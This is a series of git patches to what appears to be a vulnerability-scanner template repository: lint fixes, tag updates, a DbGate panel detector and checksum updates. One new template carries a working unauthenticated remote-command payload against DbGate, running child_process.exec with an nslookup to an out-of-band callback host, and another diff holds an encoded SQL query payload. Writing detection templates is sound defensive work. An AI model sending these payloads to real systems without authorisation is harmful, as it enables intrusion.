-        cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
+        cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - "1759837260"
+          - "{{result}}"
 
       - type: word
         words:
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
index c6b814fe88..dd24e1b370 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
@@ -10,9 +10,9 @@ info:
     - https://www.seebug.org/vuldb/ssvid-99547
     - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
   metadata:
-    max-request: 2  
+    max-request: 2
     fofa-query: app="用友-UFIDA-NC
-    verified: true  
+    verified: true
   tags: yonyou,intrusive,ufida,fileupload
 
 variables:
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
index 48a7a4d7d6..91eeb60c80 100644
--- a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
@@ -10,7 +10,7 @@ info:
     max-request: 2
     fofa-query: body="用友U8CRM"
     verified: true
-  tags: yonyou,fileupload,u8-crm
+  tags: yonyou,file-upload,u8-crm,intrusive
 
 http:
   - raw:

From 1800f3141934b22e9f9b91b9237f14b61178eac5 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Sun, 17 Sep 2023 21:46:16 +0530
Subject: [PATCH 0409/1090] fixed lint

---
 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
index e5ac882c42..f05d769826 100755
--- a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
+++ b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
@@ -1,7 +1,7 @@
 id: secsslvpn-auth-bypass
 
 info:
-  name:  Secure Access Gateway SecSSLVPN - Authentication Bypass
+  name: Secure Access Gateway SecSSLVPN - Authentication Bypass
   author: SleepingBag945
   severity: high
   description: |

From d10b4d43ae7a796afe7c368398ede7ecdb698cef Mon Sep 17 00:00:00 2001
From: Muhammad Ali <51261763+H0j3n@users.noreply.github.com>
Date: Mon, 18 Sep 2023 00:48:25 +0800
Subject: [PATCH 0410/1090] Added DbGate Nuclei Templates (#8221)

* Added DbGate Nuclei Templates

* Added DbGate Nuclei Templates

* improved matcher + metadata update

---------

Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
---
 http/exposed-panels/dbgate-panel.yaml       | 30 ++++++++++++++++++
 http/vulnerabilities/dbgate-unauth-rce.yaml | 34 +++++++++++++++++++++
 2 files changed, 64 insertions(+)
 create mode 100644 http/exposed-panels/dbgate-panel.yaml
 create mode 100644 http/vulnerabilities/dbgate-unauth-rce.yaml

diff --git a/http/exposed-panels/dbgate-panel.yaml b/http/exposed-panels/dbgate-panel.yaml
new file mode 100644
index 0000000000..d830eac6f8
--- /dev/null
+++ b/http/exposed-panels/dbgate-panel.yaml
@@ -0,0 +1,30 @@
+id: dbgate-panel
+
+info:
+  name: DbGate Web Client Management - Panel Detect
+  author: h0j3n
+  severity: info
+  description: |
+    The DbGate Web Client Management Panel is detected on the target system.
+  reference:
+    - https://github.com/dbgate/dbgate
+  classification:
+    cwe-id: CWE-200
+  metadata:
+    shodan-query: http.favicon.hash:1198579728
+  tags: panel,dbgate,oss
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>DbGate"
+          - "starting_dbgate_zero"
+          - "Loading DbGate App"
+          - "DbGate - web based opensource database administration tool for MS SQL, MySQL, Postgre SQL"
+        condition: or
diff --git a/http/vulnerabilities/dbgate-unauth-rce.yaml b/http/vulnerabilities/dbgate-unauth-rce.yaml
new file mode 100644
index 0000000000..476624c8ed
--- /dev/null
+++ b/http/vulnerabilities/dbgate-unauth-rce.yaml
@@ -0,0 +1,34 @@
+id: dbgate-unauth-rce
+
+info:
+  name: DbGate Web Client - Unauthenticated Remote Command Execution
+  author: h0j3n
+  severity: critical
+  description: |
+    DbGate Web Client Management is suspectible to an unauthenticated remote code execution vulnerability.
+  reference:
+    - https://github.com/dbgate/dbgate
+    - https://dbgate.org/docs/env-variables.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+  metadata:
+    shodan-query: http.favicon.hash:1198579728
+  tags: http,rce,oast,electron,dbgate,oss
+
+http:
+  - raw:
+      - |
+        POST /runners/start HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"script":"process.mainModule.require('child_process').exec('nslookup {{interactsh-url}}')"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, '\"runid\"')
+          - contains(interactsh_protocol, "dns")
+        condition: and
\ No newline at end of file

From 90c0b8c06212bd29d713086ae5e3733c4bf41472 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 17 Sep 2023 16:48:43 +0000
Subject: [PATCH 0411/1090] Auto Generated New Template Addition List [Sun Sep
 17 16:48:43 UTC 2023] :robot:

---
 .new-additions | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/.new-additions b/.new-additions
index b1799f0eaf..7c9309fe60 100644
--- a/.new-additions
+++ b/.new-additions
@@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-30943.yaml
 http/cves/2023/CVE-2023-39676.yaml
 http/cves/2023/CVE-2023-39677.yaml
 http/cves/2023/CVE-2023-4714.yaml
+http/exposed-panels/dbgate-panel.yaml
 http/exposed-panels/phpldapadmin-panel.yaml
 http/exposed-panels/quilium-panel.yaml
 http/exposed-panels/satis-repository.yaml
@@ -13,4 +14,5 @@ http/misconfiguration/gitlab/gitlab-public-registration.yaml
 http/osint/hackenproof.yaml
 http/osint/intigriti.yaml
 http/osint/yeswehack.yaml
+http/vulnerabilities/dbgate-unauth-rce.yaml
 http/vulnerabilities/other/phpldapadmin-xss.yaml

From 218e5679c18a72024d4d275c6c950e8b6c582c81 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 17 Sep 2023 16:48:52 +0000
Subject: [PATCH 0412/1090] Auto Generated Templates Checksum [Sun Sep 17
 16:48:52 UTC 2023] :robot:

---
 templates-checksum.txt | 408 +++++++++++++++++++++--------------------
 1 file changed, 205 insertions(+), 203 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index bcb5a0f278..5d818f3695 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:46e94935eba8934af2bfd77e17dd4bb352a4ec0d
 TEMPLATES-STATS.md:3f74e66db0aeaf37e1b9d401f4d8fc23bc8a059f
 TOP-10.md:d9e01f12d3aad16e5a340a0d8d59a87dc902e62c
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:1673d2dc4076e6abda6a30f91903556b49de4cd3
-cves.json-checksum.txt:2476f1d6388064dcabe111a582494ebf8e0b2a30
+cves.json:7bb863abb05ebec558fb0945d6a25c1916359b13
+cves.json-checksum.txt:070c22ce9772392db131ab4a99a945b9fcc6dea5
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -2994,6 +2994,7 @@ http/exposed-panels/datadog-login.yaml:e85f32bdfc0b3906ece99192691183f9c8144c39
 http/exposed-panels/dataiku-panel.yaml:ba64117fa67cf9a5855679e5197f576902d913de
 http/exposed-panels/davantis-panel.yaml:c03b26bb73911e2dbdf694aca3b2eeee5c0f1b34
 http/exposed-panels/daybyday-panel.yaml:8ed488191a395ea801b2056dceb3f47a7ce0ca2e
+http/exposed-panels/dbgate-panel.yaml:0c96150b4d0727a4f85f61af0b1f95ab48ef4ea1
 http/exposed-panels/defectdojo-panel.yaml:9e0765aa7e93715b22934b41166dcdee56bc268c
 http/exposed-panels/dell-bmc-panel-detect.yaml:00b05c9733ef2cdad0f5b795efeb8c8bb0e02a07
 http/exposed-panels/dell-idrac.yaml:3eb7b3688a666759caa5cf41f9c5b00641edc2aa
@@ -5828,218 +5829,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
